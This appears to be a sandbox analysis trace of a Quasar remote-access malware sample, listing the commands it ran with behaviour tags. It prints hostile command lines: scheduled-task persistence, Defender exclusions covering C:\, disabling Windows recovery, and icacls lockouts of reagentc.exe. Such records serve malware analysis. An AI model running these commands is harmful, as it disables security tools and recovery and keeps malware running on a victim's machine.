                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10127000101\nPJztnk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10127000101\nPJztnk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10127010101\oxDU0MW.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10127010101\oxDU0MW.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionProcess 'powershell.exe'"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionProcess 'cmd.exe'; Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionProcess 'WinTemp-v4.exe'; Add-MpPreference -ExclusionProcess 'Win-v42.exe'; Add-MpPreference -ExclusionProcess 'Win-v43.exe'"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /Create /TN "v4" /TR "C:\Windows\System32\Win-v42.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cmd.exe /C reagentc /disable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\ReAgentc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reagentc /disable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cmd.exe /C takeown /F "%SystemRoot%\System32\reagentc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\Windows\System32\reagentc.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cmd.exe /C icacls "%SystemRoot%\System32\reagentc.exe" /grant Administrators:F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Windows\System32\reagentc.exe" /grant Administrators:F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cmd.exe /C icacls "%SystemRoot%\System32\reagentc.exe" /deny Everyone:RX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Windows\System32\reagentc.exe" /deny Everyone:RX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change monitor-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change monitor-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /change hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7372
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powercfg /hibernate off
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd.exe /c ping -n 1 -w 1000 8.8.8.8 > nul
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
